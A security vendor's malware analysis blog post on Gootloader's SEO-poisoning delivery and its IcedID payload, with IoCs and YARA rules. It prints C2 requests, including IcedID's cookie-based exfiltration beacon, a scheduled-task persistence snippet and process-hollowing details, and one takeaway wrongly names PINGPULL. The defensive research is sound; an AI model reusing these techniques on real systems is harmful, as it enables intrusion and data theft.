What We Do
How we do it
Resources
TRU INTELLIGENCE CENTER
Our Threat Response Unit (TRU) publishes security advisories, blogs, reports, industry publications and webinars based on its original research and the insights driven through proactive threat hunts.
View Threat Intelligence Resources →
SECURITY ADVISORIES
Aug 03, 2022
CVE-2022-31656 – Critical VMware Vulnerability
THE THREAT On August 2nd, 2022, VMware disclosed a new critical vulnerability impacting multiple VMware products. The vulnerability, tracked as CVE-2022-31656 (CVSS: 9.8) is an authentication…
Read More
View all Advisories →
Company
ABOUT ESENTIRE
About Us
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 1500+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
Read about how we got here
Leadership Work at eSentire
LATEST PRESS RELEASE
Aug 11, 2022
eSentire Researchers Unmask the Top Malware Supplier to Russia’s Most Notorious Financial Crime Families: Fin6 and Cobalt Group
Waterloo, ON, and Las Vegas, NV, August 11, 2022 — eSentire, the Authority in Managed Detection and Response (MDR), released a report today, unmasking the threat actor behind the Golden Chickens malware, the weapon of choice for Russia’s most infamous financial cybercrime families— FIN6 and Cobalt Group. Joe Stewart and Keegan Keplinger, security researchers with eSentire‘s Threat Response Unit…
Read More
Partners
PARTNER PROGRAM
e3 Ecosystem
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Learn more
ECOSYSTEM PARTNER RESOURCES
Apply to become an e3 ecosystem partner with eSentire, the Authority in Managed Detection and Response.
Login to the Partner Portal for resources and content for current partners.
Search
Resources
Blog — Jul 18, 2022

eSentire Threat Intelligence Malware Analysis: Gootloader and IcedID

10 minutes read
Speak With A Security Expert Now

Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.

In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.

This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • Gootloader is a sophisticated malware, which, upon communication with a C2 server, serves the second-stage payload only for machines that are a part of the Active Directory.
  • The threat actor(s) has been switching between delivering Cobalt Strike and IcedID as a second-stage payload. eSentire’s Threat Response Unit (TRU) team assesses with high confidence that threat actors are delivering IcedID, instead of Cobalt Strike as a second stage, as it is a stealthier option to avoid the detection.
    • Gootloader has been observed dropping Cobalt Strike payloads under HKCU\SOFTWARE\Microsoft\Phone\username0, HKCU\SOFTWARE\Microsoft\Phone\username (username0)
    • Gootloader has been observed dropping IcedID payloads under HKCU\SOFTWARE\Microsoft\username (username0)
  • Gootloader is using a process hollowing technique to inject IcedID loader into PowerShell processes. PowerShell can be used for legitimate process running in the background; thus, Gootloader infections can go unnoticed.
  • To secure your organization against PINGPULL, eSentire’s Threat Response Unit (TRU) team recommends:
    • Implement a Phishing and Security Awareness Training (PSAT) program that educates & informs employees on emerging threats in the threat landscape.
    • Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
    • Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, implementing Least-Privilege administrative models.
    • Ensure standard procedures are in place for employees to submit potentially malicious content for review.

Case Study

eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file. The ZIP archive contains the JavaScript malicious file that is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.

Gootloader and IcedID Technical Analysis

As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.

Exhibit 1: Gootloader leveraging SEO poisoning to deliver the initial payload


When visiting one of the many compromised websites, the user is served with a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information is recorded during the visit, if the user visits a subsequent infected webpage, they will not be served with another Gootloader payload.

Exhibit 2: Gootloader's landing page


The JavaScript file within the ZIP archive decodes itself during the runtime and reaches out to one of the three hardcoded compromised websites.

The script checks if the infected host is a part of the Active Directory domain by using the environment variable %USERDNSDOMAIN%, the variable contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” appends to the URL GET request that gets sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).

The GET request (on a domain joined machine):

GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
Connection: Keep-Alive
Accept: */*    
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www[.]liveshopping-aktuell[.]de
Exhibit 3: Part of the decoded malicious JavaScript file


Upon the successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first main encoded payload is written to the registry key under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ via Wscript process using RegWrite Method (Exhibits 4-5).

Exhibit 4: Second-stage main payload


Exhibit 5: Second-stage main payload (registry view)


The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and is named as powershell.dll. The C# payload is responsible for decoding the main payload by replacing the ASCII characters with numeric values within Test() Class (Exhibit 7).

Exhibit 6: Second payload (registry view)


Exhibit 7: C# DLL payload responsible for decoding the main payload


eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.

Gootloader uses process hollowing techniques (i.e., replacing the legitimate executable section of the process with a malicious code by hollowing or unmapping its memory) to inject the main payload into the PowerShell process via Foad() Class using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread as shown in Exhibit 8. Previously, GootLoader was observed to inject the payloads into ImagingDevice.exe process.

Exhibit 8: Process Hollowing technique used by GootLoader


In some cases, we have observed the scheduled task is created as a persistence mechanism to decode the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in-memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).

Exhibit 9: Base64-encoded PowerShell script


Exhibit 10: Loading .NET payload in-memory (base64-decoded PowerShell script)


The following code block responsible for creating the scheduled task (the scheduled task is named after the username):

$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac 
(New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))

eSentire TRU was able to identify the main payload as IcedID.

IcedID Analysis

The sample was compiled on May 25th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MingW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).

IcedID performs anti-VM/anti-sandboxing techniques to check if it’s running in a sandbox environment using RDTSC (Read Time Stamp Counter) instruction to get a processor’s time stamp counter as well as CPUID, SwitchToThread instructions with a loop for an accurate measurement during the calculation of the execution times (Exhibit 11).

Exhibit 11: Sandbox evasion technique


IcedID gathers the information on the infected machine and transfers it via the Cookie parameter with GET request as shown below:

GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
Host: ilekvoyn[dot]com

Breakdown of the Cookie parameters:

Exhibit 15: Retrieving the network adapter information


After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).

Exhibit 16: Placing the payload under ProgramData (1)


Exhibit 17: Placing the payload under ProgramData (2)


As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities that threat actor(s) need to deploy a secondary payload from the C2 server. IcedID was observed to deliver Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU) 

We recommend implementing the following controls to help secure your organization against Gootloader and Iced ID malware:

While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

Indicators of Compromise

Name Indicators
IcedID packed payload 157d12885e5f6434436862aadd6224cd
IcedID unpacked payload 578143ef946796590c0dd5f5dcfdada7
IcedID C2 ilekvoyn[dot]com
Gootloader C2 www[dot]liveshopping-aktuell[dot]de
Gootloader C2 www[dot]lightnessofbeing[dot]net
Gootloader C2 www[dot]lintelconsulting[dot]co[dot]uk
employee confidentiality agreement texas(9898).zip - Gootloader initial payload (ZIP archive) 1c822f5a7d92307f9cf8ad5f28f61a76
employee_confidentiality_agreement_texas 19855.js - Gootloader initial payload (JavaScript file) c6bac95375b8c7fb3b16c7dff98d2cc0
IcedID campaign ID 277708695

Yara Rules

Yara Rules

rule gootloader_JS {
  meta:
        description = "Detects Gootloader JavaScript file"
        author = "eSentire TI"
        date = "06/13/2022"
  strings:
        $a = "w+"
        $a1 = "x\\"
        $a2 = "Sp"
        $a3 = "E\\"
        $a4 = "function"
        $a5 = "while"
  condition:
        all of ($a*) and filesize < 300KB
    }
rule IcedID_loader {
  meta:
        description = "Detects IcedID loader"
        author = "eSentire TI"
        date = "06/13/2022"
        
  strings:
        $a = "oCookie: _s=" wide fullword nocase
        $a1 = "Cookie: __gads=" wide fullword nocase
        $a2 = "oCookie: _s=" wide fullword nocase
        $a3 = "__io=" wide fullword nocase
        $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
        $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
        $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
        $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
  condition:
        all of ($a*) and filesize < 20KB
    }

Skip To:

  • Key Takeaways
  • Case Study
  • Gootloader and IcedID Technical Analysis
  • IcedID Analysis
  • How eSentire is Responding
  • Recommendations from eSentire’s Threat Response Unit (TRU) 
  • Appendix

Join 100,000+ Security Leaders

Get notified of the latest news, intel and helpful tools & assets. You can unsubscribe anytime.

By clicking the button below I confirm that I have read and agree to the eSentire privacy policy.

View Most Recent Blogs
eSentire Threat Response Unit (TRU)
eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.